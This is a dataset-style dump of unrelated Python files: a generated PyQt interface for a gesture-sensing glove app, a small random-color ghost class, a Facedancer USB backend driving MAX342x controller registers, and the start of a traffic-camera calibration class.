self.indexSideLabel.setObjectName("indexSideLabel")
self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.indexSideLabel)
self.indexSideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexSideLineEdit.setFont(font)
self.indexSideLineEdit.setReadOnly(True)
self.indexSideLineEdit.setObjectName("indexSideLineEdit")
self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.indexSideLineEdit)
self.indexTopLabel = QtWidgets.QLabel(self.gBoxTouch)
self.indexTopLabel.setObjectName("indexTopLabel")
self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.indexTopLabel)
self.indexTopLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexTopLineEdit.setFont(font)
self.indexTopLineEdit.setReadOnly(True)
self.indexTopLineEdit.setObjectName("indexTopLineEdit")
self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.indexTopLineEdit)
self.middleTopLabel = QtWidgets.QLabel(self.gBoxTouch)
self.middleTopLabel.setObjectName("middleTopLabel")
self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.middleTopLabel)
self.middleTopLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleTopLineEdit.setFont(font)
self.middleTopLineEdit.setReadOnly(True)
self.middleTopLineEdit.setObjectName("middleTopLineEdit")
self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.middleTopLineEdit)
self.middleSideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.middleSideLabel.setObjectName("middleSideLabel")
self.formLayout_2.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.middleSideLabel)
self.middleSideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleSideLineEdit.setFont(font)
self.middleSideLineEdit.setReadOnly(True)
self.middleSideLineEdit.setObjectName("middleSideLineEdit")
self.formLayout_2.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.middleSideLineEdit)
self.ringSideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.ringSideLabel.setObjectName("ringSideLabel")
self.formLayout_2.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.ringSideLabel)
self.ringSideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.ringSideLineEdit.setFont(font)
self.ringSideLineEdit.setReadOnly(True)
self.ringSideLineEdit.setObjectName("ringSideLineEdit")
self.formLayout_2.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.ringSideLineEdit)
self.pinkySideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.pinkySideLabel.setObjectName("pinkySideLabel")
self.formLayout_2.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.pinkySideLabel)
self.pinkySideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.pinkySideLineEdit.setFont(font)
self.pinkySideLineEdit.setReadOnly(True)
self.pinkySideLineEdit.setObjectName("pinkySideLineEdit")
self.formLayout_2.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.pinkySideLineEdit)
self.pinkyTopLabel = QtWidgets.QLabel(self.gBoxTouch)
self.pinkyTopLabel.setObjectName("pinkyTopLabel")
self.formLayout_2.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.pinkyTopLabel)
self.pinkyTopLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.pinkyTopLineEdit.setFont(font)
self.pinkyTopLineEdit.setReadOnly(True)
self.pinkyTopLineEdit.setObjectName("pinkyTopLineEdit")
self.formLayout_2.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.pinkyTopLineEdit)
self.horizontalLayout_dataOut.addWidget(self.gBoxTouch)
self.verticalLayout_quat_euler = QtWidgets.QVBoxLayout()
self.verticalLayout_quat_euler.setObjectName("verticalLayout_quat_euler")
self.gBoxQuat = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxQuat.setObjectName("gBoxQuat")
self.formLayout_3 = QtWidgets.QFormLayout(self.gBoxQuat)
self.formLayout_3.setObjectName("formLayout_3")
self.quatWLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatWLabel.setObjectName("quatWLabel")
self.formLayout_3.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.quatWLabel)
self.quatWLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatWLineEdit.setFont(font)
self.quatWLineEdit.setReadOnly(True)
self.quatWLineEdit.setObjectName("quatWLineEdit")
self.formLayout_3.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.quatWLineEdit)
self.quatXLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatXLabel.setObjectName("quatXLabel")
self.formLayout_3.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.quatXLabel)
self.quatXLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatXLineEdit.setFont(font)
self.quatXLineEdit.setReadOnly(True)
self.quatXLineEdit.setObjectName("quatXLineEdit")
self.formLayout_3.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.quatXLineEdit)
self.quatYLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatYLabel.setObjectName("quatYLabel")
self.formLayout_3.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.quatYLabel)
self.quatYLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatYLineEdit.setFont(font)
self.quatYLineEdit.setReadOnly(True)
self.quatYLineEdit.setObjectName("quatYLineEdit")
self.formLayout_3.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.quatYLineEdit)
self.quatZLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatZLabel.setObjectName("quatZLabel")
self.formLayout_3.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.quatZLabel)
self.quatZLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatZLineEdit.setFont(font)
self.quatZLineEdit.setReadOnly(True)
self.quatZLineEdit.setObjectName("quatZLineEdit")
self.formLayout_3.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.quatZLineEdit)
self.verticalLayout_quat_euler.addWidget(self.gBoxQuat)
self.gBoxEuler = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxEuler.setObjectName("gBoxEuler")
self.formLayout_5 = QtWidgets.QFormLayout(self.gBoxEuler)
self.formLayout_5.setObjectName("formLayout_5")
self.rollLabel = QtWidgets.QLabel(self.gBoxEuler)
self.rollLabel.setObjectName("rollLabel")
self.formLayout_5.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.rollLabel)
self.rollLineEdit = QtWidgets.QLineEdit(self.gBoxEuler)
self.rollLineEdit.setMaxLength(5)
self.rollLineEdit.setObjectName("rollLineEdit")
self.formLayout_5.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.rollLineEdit)
self.pitchLabel = QtWidgets.QLabel(self.gBoxEuler)
self.pitchLabel.setObjectName("pitchLabel")
self.formLayout_5.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.pitchLabel)
self.pitchLineEdit = QtWidgets.QLineEdit(self.gBoxEuler)
self.pitchLineEdit.setMaxLength(5)
self.pitchLineEdit.setObjectName("pitchLineEdit")
self.formLayout_5.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.pitchLineEdit)
self.yawLabel = QtWidgets.QLabel(self.gBoxEuler)
self.yawLabel.setObjectName("yawLabel")
self.formLayout_5.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.yawLabel)
self.yawLineEdit = QtWidgets.QLineEdit(self.gBoxEuler)
self.yawLineEdit.setMaxLength(5)
self.yawLineEdit.setObjectName("yawLineEdit")
self.formLayout_5.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.yawLineEdit)
self.verticalLayout_quat_euler.addWidget(self.gBoxEuler)
self.horizontalLayout_dataOut.addLayout(self.verticalLayout_quat_euler)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.gBoxAccel = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxAccel.setObjectName("gBoxAccel")
self.formLayout_4 = QtWidgets.QFormLayout(self.gBoxAccel)
self.formLayout_4.setObjectName("formLayout_4")
self.accelXLabel = QtWidgets.QLabel(self.gBoxAccel)
self.accelXLabel.setObjectName("accelXLabel")
self.formLayout_4.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.accelXLabel)
self.accelXLineEdit = QtWidgets.QLineEdit(self.gBoxAccel)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.accelXLineEdit.setFont(font)
self.accelXLineEdit.setReadOnly(True)
self.accelXLineEdit.setObjectName("accelXLineEdit")
self.formLayout_4.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.accelXLineEdit)
self.accelYLabel = QtWidgets.QLabel(self.gBoxAccel)
self.accelYLabel.setObjectName("accelYLabel")
self.formLayout_4.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.accelYLabel)
self.accelYLineEdit = QtWidgets.QLineEdit(self.gBoxAccel)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.accelYLineEdit.setFont(font)
self.accelYLineEdit.setReadOnly(True)
self.accelYLineEdit.setObjectName("accelYLineEdit")
self.formLayout_4.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.accelYLineEdit)
self.accelZLabel = QtWidgets.QLabel(self.gBoxAccel)
self.accelZLabel.setObjectName("accelZLabel")
self.formLayout_4.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.accelZLabel)
self.accelZLineEdit = QtWidgets.QLineEdit(self.gBoxAccel)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.accelZLineEdit.setFont(font)
self.accelZLineEdit.setReadOnly(True)
self.accelZLineEdit.setObjectName("accelZLineEdit")
self.formLayout_4.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.accelZLineEdit)
self.verticalLayout_2.addWidget(self.gBoxAccel)
self.gBoxOrientation = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxOrientation.setObjectName("gBoxOrientation")
self.formLayout_6 = QtWidgets.QFormLayout(self.gBoxOrientation)
self.formLayout_6.setObjectName("formLayout_6")
self.directionLabel = QtWidgets.QLabel(self.gBoxOrientation)
self.directionLabel.setObjectName("directionLabel")
self.formLayout_6.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.directionLabel)
self.directionLineEdit = QtWidgets.QLineEdit(self.gBoxOrientation)
self.directionLineEdit.setObjectName("directionLineEdit")
self.formLayout_6.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.directionLineEdit)
self.verticalLayout_2.addWidget(self.gBoxOrientation)
self.horizontalLayout_dataOut.addLayout(self.verticalLayout_2)
self.verticalLayout_adds = QtWidgets.QVBoxLayout()
self.verticalLayout_adds.setObjectName("verticalLayout_adds")
self.gBoxSerialParse = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxSerialParse.setObjectName("gBoxSerialParse")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.gBoxSerialParse)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnSerialParseStop = QtWidgets.QPushButton(self.gBoxSerialParse)
self.btnSerialParseStop.setObjectName("btnSerialParseStop")
self.horizontalLayout.addWidget(self.btnSerialParseStop)
self.btnSerialParseStart = QtWidgets.QPushButton(self.gBoxSerialParse)
self.btnSerialParseStart.setObjectName("btnSerialParseStart")
self.horizontalLayout.addWidget(self.btnSerialParseStart)
self.verticalLayout_adds.addWidget(self.gBoxSerialParse)
self.gBoxHandAnimate = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxHandAnimate.setObjectName("gBoxHandAnimate")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.gBoxHandAnimate)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.btnHandAnimateStop = QtWidgets.QPushButton(self.gBoxHandAnimate)
self.btnHandAnimateStop.setObjectName("btnHandAnimateStop")
self.horizontalLayout_3.addWidget(self.btnHandAnimateStop)
self.btnHandAnimateStart = QtWidgets.QPushButton(self.gBoxHandAnimate)
self.btnHandAnimateStart.setObjectName("btnHandAnimateStart")
self.horizontalLayout_3.addWidget(self.btnHandAnimateStart)
self.verticalLayout_adds.addWidget(self.gBoxHandAnimate)
self.gBoxPlotSignals = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxPlotSignals.setObjectName("gBoxPlotSignals")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.gBoxPlotSignals)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnPlotSignalsStop = QtWidgets.QPushButton(self.gBoxPlotSignals)
self.btnPlotSignalsStop.setObjectName("btnPlotSignalsStop")
self.horizontalLayout_2.addWidget(self.btnPlotSignalsStop)
self.btnPlotSignalsStart = QtWidgets.QPushButton(self.gBoxPlotSignals)
self.btnPlotSignalsStart.setObjectName("btnPlotSignalsStart")
self.horizontalLayout_2.addWidget(self.btnPlotSignalsStart)
self.verticalLayout_adds.addWidget(self.gBoxPlotSignals)
self.checkBoxDataOutAvg = QtWidgets.QCheckBox(self.centralwidget)
self.checkBoxDataOutAvg.setObjectName("checkBoxDataOutAvg")
self.verticalLayout_adds.addWidget(self.checkBoxDataOutAvg)
self.horizontalLayout_dataOut.addLayout(self.verticalLayout_adds)
self.verticalLayout.addLayout(self.horizontalLayout_dataOut)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1280, 38))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
    """Install (re)translated user-visible strings on every widget.

    Auto-generated by Qt Designer / pyuic5: each call wraps the literal
    in QCoreApplication.translate so Qt's translation machinery can swap
    languages at runtime.  Do not hand-edit the strings here; regenerate
    from the .ui file instead.

    NOTE(review): "ThumbKnucke" and "Capactive" look like typos carried
    over from the .ui file -- fix them there and regenerate, since these
    are runtime-visible labels.
    """
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "HandsOn Developer"))
    # --- "Capture Gesture" tab ---
    self.labelFile.setText(_translate("MainWindow", "Output File:"))
    self.btnFileOut.setText(_translate("MainWindow", "Load/Create File"))
    self.labelOutFileViewer.setText(_translate("MainWindow", "Output File Viewer:"))
    self.labelGestCap.setText(_translate("MainWindow", "Gesture Identifier:"))
    self.btnGestCap.setText(_translate("MainWindow", "Capture Gesture"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.captureTab), _translate("MainWindow", "Capture Gesture"))
    # --- "Train Classifier" tab ---
    self.labelTrainFile.setText(_translate("MainWindow", "Training File:"))
    self.btnTrainFile.setText(_translate("MainWindow", "Load File"))
    self.labelTrainFileViewer.setText(_translate("MainWindow", "Training File Viewer:"))
    self.labelTrainStatus.setText(_translate("MainWindow", "Classifier Status:"))
    self.lineEditTrainStatus.setPlaceholderText(_translate("MainWindow", "Not Ready"))
    self.btnTrainClassifier.setText(_translate("MainWindow", "Train Classifier"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.trainTab), _translate("MainWindow", "Train Classifier"))
    # --- "Classify Real Time" tab ---
    self.checkBoxTtoS.setText(_translate("MainWindow", "Enable Text-to-Speech"))
    self.checkBoxClassRTdebug.setText(_translate("MainWindow", "Enable Debug Output"))
    self.labelClassRtDelay.setText(_translate("MainWindow", "Set Delay (s):"))
    self.lineEditClassRtDelay.setPlaceholderText(_translate("MainWindow", "0.5"))
    self.labelClassRT.setText(_translate("MainWindow", "Real Time Classification:"))
    self.btnClassifyStop.setText(_translate("MainWindow", "Stop"))
    self.btnClassifyStart.setText(_translate("MainWindow", "Start"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.classifyRealTab), _translate("MainWindow", "Classify Real Time"))
    # --- live data read-out group boxes ---
    self.gBoxFlex.setTitle(_translate("MainWindow", "Flex Sensors"))
    self.indexLabel.setText(_translate("MainWindow", "Index"))
    self.indexKnuckleLabel.setText(_translate("MainWindow", "IndexKnuckle"))
    self.middleLabel.setText(_translate("MainWindow", "Middle"))
    self.middleKnuckleLabel.setText(_translate("MainWindow", "MiddleKnuckle"))
    self.ringLabel.setText(_translate("MainWindow", "Ring"))
    self.ringKnuckleLabel.setText(_translate("MainWindow", "RingKnuckle"))
    self.pinkyLabel.setText(_translate("MainWindow", "Pinky"))
    self.thumbLabel.setText(_translate("MainWindow", "Thumb"))
    self.thumbKnuckeLabel.setText(_translate("MainWindow", "ThumbKnucke"))
    self.gBoxTouch.setTitle(_translate("MainWindow", "Touch Capactive Sensors"))
    self.indexSideLabel.setText(_translate("MainWindow", "IndexSide"))
    self.indexTopLabel.setText(_translate("MainWindow", "IndexTop"))
    self.middleTopLabel.setText(_translate("MainWindow", "MiddleTop"))
    self.middleSideLabel.setText(_translate("MainWindow", "MiddleSide"))
    self.ringSideLabel.setText(_translate("MainWindow", "RingSide"))
    self.pinkySideLabel.setText(_translate("MainWindow", "PinkySide"))
    self.pinkyTopLabel.setText(_translate("MainWindow", "PinkyTop"))
    self.gBoxQuat.setTitle(_translate("MainWindow", "Quaternions"))
    self.quatWLabel.setText(_translate("MainWindow", "quatW"))
    self.quatXLabel.setText(_translate("MainWindow", "quatX"))
    self.quatYLabel.setText(_translate("MainWindow", "quatY"))
    self.quatZLabel.setText(_translate("MainWindow", "quatZ"))
    self.gBoxEuler.setTitle(_translate("MainWindow", "Euler Angles"))
    self.rollLabel.setText(_translate("MainWindow", "Roll:"))
    self.pitchLabel.setText(_translate("MainWindow", "Pitch"))
    self.yawLabel.setText(_translate("MainWindow", "Yaw"))
    self.gBoxAccel.setTitle(_translate("MainWindow", "Linear Acceleration"))
    self.accelXLabel.setText(_translate("MainWindow", "accelX"))
    self.accelYLabel.setText(_translate("MainWindow", "accelY"))
    self.accelZLabel.setText(_translate("MainWindow", "accelZ"))
    self.gBoxOrientation.setTitle(_translate("MainWindow", "Orientation"))
    self.directionLabel.setText(_translate("MainWindow", "Direction"))
    # --- start/stop control groups ---
    self.gBoxSerialParse.setTitle(_translate("MainWindow", "Serial Parser"))
    self.btnSerialParseStop.setText(_translate("MainWindow", "Stop"))
    self.btnSerialParseStart.setText(_translate("MainWindow", "Start"))
    self.gBoxHandAnimate.setTitle(_translate("MainWindow", "Hand Animation"))
    self.btnHandAnimateStop.setText(_translate("MainWindow", "Stop"))
    self.btnHandAnimateStart.setText(_translate("MainWindow", "Start"))
    self.gBoxPlotSignals.setTitle(_translate("MainWindow", "Plot Signals"))
    self.btnPlotSignalsStop.setText(_translate("MainWindow", "Stop"))
    self.btnPlotSignalsStart.setText(_translate("MainWindow", "Start"))
    self.checkBoxDataOutAvg.setText(_translate("MainWindow", "Display moving window average"))
|
991,276 | 65626faf1afb754839d03bc3cf46f3da53d27f5a | from random import randint
class Ghost(object):
    """A ghost whose color is chosen at random when it is created."""

    def __init__(self):
        palette = ['white', 'yellow', 'purple', 'red']
        # randint is inclusive on both ends, so this indexes every entry.
        idx = randint(0, len(palette) - 1)
        self.color = palette[idx]
# Demo: build one ghost and report which color it was assigned.
demo_ghost = Ghost()
print(demo_ghost.color)
991,277 | 0b05c617a3e4cfeff2e235930ff8b2d349e21d5d | # MAXUSBApp.py
#
# Contains class definition for MAXUSBApp.
import time
from ..core import FacedancerApp
from ..USB import *
from ..USBDevice import USBDeviceRequest
class MAXUSBApp(FacedancerApp):
    """Facedancer application backend for MAX342x USB device controllers.

    The register addresses and IRQ bitmasks below mirror the MAX3420E
    register map.  Endpoint layout is fixed by the chip: EP0 is the
    bidirectional control endpoint, EP1 is OUT-only, EP2 and EP3 are
    IN-only.  Concrete register/byte transfer primitives
    (read_register/write_register/read_bytes/write_bytes) are supplied
    by the subclass/base -- not visible here.
    """

    # --- register addresses (one FIFO / byte-count pair per endpoint) ---
    reg_ep0_fifo = 0x00
    reg_ep1_out_fifo = 0x01
    reg_ep2_in_fifo = 0x02
    reg_ep3_in_fifo = 0x03
    reg_setup_data_fifo = 0x04
    reg_ep0_byte_count = 0x05
    reg_ep1_out_byte_count = 0x06
    reg_ep2_in_byte_count = 0x07
    reg_ep3_in_byte_count = 0x08
    reg_ep_stalls = 0x09
    reg_clr_togs = 0x0a
    reg_endpoint_irq = 0x0b
    reg_endpoint_interrupt_enable = 0x0c
    reg_usb_irq = 0x0d
    reg_usb_interrupt_enable = 0x0e
    reg_usb_control = 0x0f
    reg_cpu_control = 0x10
    reg_pin_control = 0x11
    reg_revision = 0x12
    reg_function_address = 0x13
    reg_io_pins = 0x14

    # bitmask values for reg_endpoint_irq = 0x0b
    is_setup_data_avail = 0x20  # SUDAVIRQ
    is_in3_buffer_avail = 0x10  # IN3BAVIRQ
    is_in2_buffer_avail = 0x08  # IN2BAVIRQ
    is_out1_data_avail = 0x04   # OUT1DAVIRQ
    is_out0_data_avail = 0x02   # OUT0DAVIRQ
    is_in0_buffer_avail = 0x01  # IN0BAVIRQ

    # bitmask values for reg_usb_control = 0x0f
    usb_control_vbgate = 0x40
    usb_control_connect = 0x08

    # bitmask values for reg_pin_control = 0x11
    interrupt_level = 0x08
    full_duplex = 0x10
    ep0_in_nak = (1 << 5)
    ep2_in_nak = (1 << 6)
    ep3_in_nak = (1 << 7)

    # TODO: Support a generic MaxUSB interface that doesn't
    # depend on any GoodFET details.

    @staticmethod
    def bytes_as_hex(b, delim=" "):
        """Render an iterable of byte values as delimited hex, e.g. '01 ff'."""
        return delim.join(["%02x" % x for x in b])

    # HACK: but given the limitations of the MAX chips, it seems necessary
    def send_on_endpoint(self, ep_num, data, blocking=False):
        """Write ``data`` out on IN-capable endpoint ``ep_num`` (0, 2 or 3).

        Raises ValueError for any other endpoint number.  Data longer than
        the 64-byte hardware FIFO is sent in 64-byte chunks.
        """
        if ep_num == 0:
            fifo_reg = self.reg_ep0_fifo
            bc_reg = self.reg_ep0_byte_count
        elif ep_num == 2:
            fifo_reg = self.reg_ep2_in_fifo
            bc_reg = self.reg_ep2_in_byte_count
        elif ep_num == 3:
            fifo_reg = self.reg_ep3_in_fifo
            bc_reg = self.reg_ep3_in_byte_count
        else:
            raise ValueError('endpoint ' + str(ep_num) + ' not supported')

        # FIFO buffer is only 64 bytes, must loop
        while len(data) > 64:
            self.write_bytes(fifo_reg, data[:64])
            # Writing the byte count arms the FIFO for transmission.
            self.write_register(bc_reg, 64, ack=True)
            data = data[64:]

        self.write_bytes(fifo_reg, data)
        self.write_register(bc_reg, len(data), ack=True)

        if self.verbose > 1:
            print(self.app_name, "wrote", self.bytes_as_hex(data), "to endpoint",
                  ep_num)

    # HACK: but given the limitations of the MAX chips, it seems necessary
    def read_from_endpoint(self, ep_num):
        """Drain and return pending bytes from OUT endpoint 1.

        Returns b'' for any other endpoint (EP1 is the chip's only
        non-control OUT endpoint) or when no data is pending.
        """
        if ep_num != 1:
            return b''

        byte_count = self.read_register(self.reg_ep1_out_byte_count)
        if byte_count == 0:
            return b''

        data = self.read_bytes(self.reg_ep1_out_fifo, byte_count)

        if self.verbose > 1:
            print(self.app_name, "read", self.bytes_as_hex(data), "from endpoint",
                  ep_num)

        return data

    def stall_endpoint(self, ep_number, direction=0):
        """
        Stalls an arbitrary endpoint.

        ep_number: The endpoint number to be stalled
        direction: 0 for out, 1 for in (currently unused; the MAX342x
            stall bits are per-endpoint rather than per-direction,
            except for EP0 -- TODO confirm against the datasheet)
        """
        if self.verbose > 0:
            print(self.app_name, "stalling endpoint {}".format(ep_number))

        # TODO: Verify our behavior, here. The original facedancer code stalls
        # EP0 both _in_ and out, as well as uses the special STALL SETUP bit.
        # Is this really what we want?
        if ep_number == 0:
            # 0x23 stalls both directions of EP0 plus the status stage.
            self.write_register(self.reg_ep_stalls, 0x23)
        elif ep_number < 4:
            # BUGFIX: this previously called the nonexistent
            # self.write_writer() with the undefined name ep_num, so
            # stalling any non-zero endpoint crashed with
            # AttributeError/NameError.  EPSTALLS bit (n + 1) stalls
            # endpoint n (EP1OUT=bit2, EP2IN=bit3, EP3IN=bit4).
            self.write_register(self.reg_ep_stalls, 1 << (ep_number + 1))
        else:
            raise ValueError("Invalid endpoint for MAXUSB device!")

    def stall_ep0(self):
        """Convenience wrapper: stall the control endpoint."""
        return self.stall_endpoint(0)

    def get_version(self):
        """Return the chip revision register value."""
        return self.read_register(self.reg_revision)

    def connect(self, usb_device, max_ep0_packet_size=64):
        """Present ``usb_device`` to the host by asserting the CONNECT bit."""
        # If we're already connected, briefly drop CONNECT (keeping VBGATE)
        # so the host sees a fresh attach.
        if self.read_register(self.reg_usb_control) & self.usb_control_connect:
            self.write_register(self.reg_usb_control, self.usb_control_vbgate)
            time.sleep(.1)

        self.write_register(self.reg_usb_control, self.usb_control_vbgate |
                            self.usb_control_connect)

        self.connected_device = usb_device

        if self.verbose > 0:
            print(self.app_name, "connected device", self.connected_device.name)

    def disconnect(self):
        """Drop the CONNECT bit and forget the attached device."""
        self.write_register(self.reg_usb_control, self.usb_control_vbgate)

        if self.verbose > 0:
            print(self.app_name, "disconnected device", self.connected_device.name)

        self.connected_device = None

    def clear_irq_bit(self, reg, bit):
        """Acknowledge an IRQ: these registers are write-1-to-clear."""
        self.write_register(reg, bit)

    def service_irqs(self):
        """Poll and dispatch all pending endpoint/NAK interrupts once."""
        irq = self.read_register(self.reg_endpoint_irq)
        in_nak = self.read_register(self.reg_pin_control)

        if self.verbose > 3:
            print(self.app_name, "read endpoint irq: 0x%02x" % irq)
            print(self.app_name, "read pin control: 0x%02x" % in_nak)

        if self.verbose > 2:
            if irq & ~ (self.is_in0_buffer_avail \
                    | self.is_in2_buffer_avail | self.is_in3_buffer_avail):
                print(self.app_name, "notable irq: 0x%02x" % irq)

        if irq & self.is_setup_data_avail:
            # Ack first, then read the 8-byte SETUP packet.
            self.clear_irq_bit(self.reg_endpoint_irq, self.is_setup_data_avail)

            b = self.read_bytes(self.reg_setup_data_fifo, 8)
            # Host-to-device requests (bit 7 of bmRequestType clear) may
            # carry wLength data bytes in the EP0 FIFO.
            if (irq & self.is_out0_data_avail) and (b[0] & 0x80 == 0x00):
                data_bytes_len = b[6] + (b[7] << 8)
                b += self.read_bytes(self.reg_ep0_fifo, data_bytes_len)
            req = self.connected_device.create_request(b)
            self.connected_device.handle_request(req)

        if irq & self.is_out1_data_avail:
            data = self.read_from_endpoint(1)
            if data:
                self.connected_device.handle_data_available(1, data)
            self.clear_irq_bit(self.reg_endpoint_irq, self.is_out1_data_avail)

        if irq & self.is_in2_buffer_avail:
            self.connected_device.handle_buffer_available(2)

        if irq & self.is_in3_buffer_avail:
            self.connected_device.handle_buffer_available(3)

        # Check to see if we've NAK'd on either of our IN endpoints,
        # and generate the relevant events.
        # NOTE(review): these acks write back *all* currently-set pin-control
        # bits OR'd with the NAK flag, not just the one flag -- verify this
        # is intended for a write-1-to-clear register.
        if in_nak & self.ep2_in_nak:
            self.connected_device.handle_nak(2)
            self.clear_irq_bit(self.reg_pin_control, in_nak | self.ep2_in_nak)

        if in_nak & self.ep3_in_nak:
            self.connected_device.handle_nak(3)
            self.clear_irq_bit(self.reg_pin_control, in_nak | self.ep3_in_nak)

    def set_address(self, address, defer=False):
        """
        Sets the device address of the Facedancer. Usually only used during
        initial configuration.

        address: The address that the Facedancer should assume.
        defer: Accepted for interface compatibility; unused here.
        """
        # The MAXUSB chip handles this for us, so we don't need to do anything.
        pass

    def configured(self, configuration):
        """
        Callback that's issued when a USBDevice is configured, e.g. by the
        SET_CONFIGURATION request. Allows us to apply the new configuration.

        configuration: The configuration applied by the SET_CONFIG request.
        """
        # For the MAXUSB case, we don't need to do anything, though it might
        # be nice to print a message or store the active configuration for
        # use by the USBDevice, etc. etc.
        pass
|
991,278 | 30fd23d3de4a569db9b1dfd4b1d89d6d44629e5a | from sympy import Line, Point, intersection
import numpy as np
import yaml
import os.path
from os.path import realpath, dirname
class ParameterCompute(object):
    """
    Roadside-camera self-calibration from vanishing points.

    Schoepflin, T.N., and D.J. Dailey. 2003.
    “Dynamic Camera Calibration of Roadside Traffic Management Cameras for Vehicle Speed Estimation.”
    IEEE Transactions on Intelligent Transportation Systems 4 (2): 90–98.
    https://doi.org/10.1109/TITS.2003.821213.
    """

    def __init__(self, extent_x, extent_y, one_point=True, **kwargs):
        """
        [1]N. K. Kanhere and S. T. Birchfield,
        “A Taxonomy and Analysis of Camera Calibration Methods for Traffic Monitoring Applications,”
        IEEE Transactions on Intelligent Transportation Systems, vol. 11, no. 2, pp. 441–452, Jun. 2010.

        Input points use the upper left corner as origin point:
        road direction: p1, p2 | p3, p4
        perpendicular direction: p1, p4 | p2, p3
        width x value: u2, u3,
        length y value: vb, vf
        width: w
        length: l
        """
        # Half-extents: used to recenter pixel coordinates so the image
        # center becomes the origin (principal point assumed at the image
        # center -- TODO confirm).
        self.shift_x = extent_x / 2
        self.shift_y = extent_y / 2
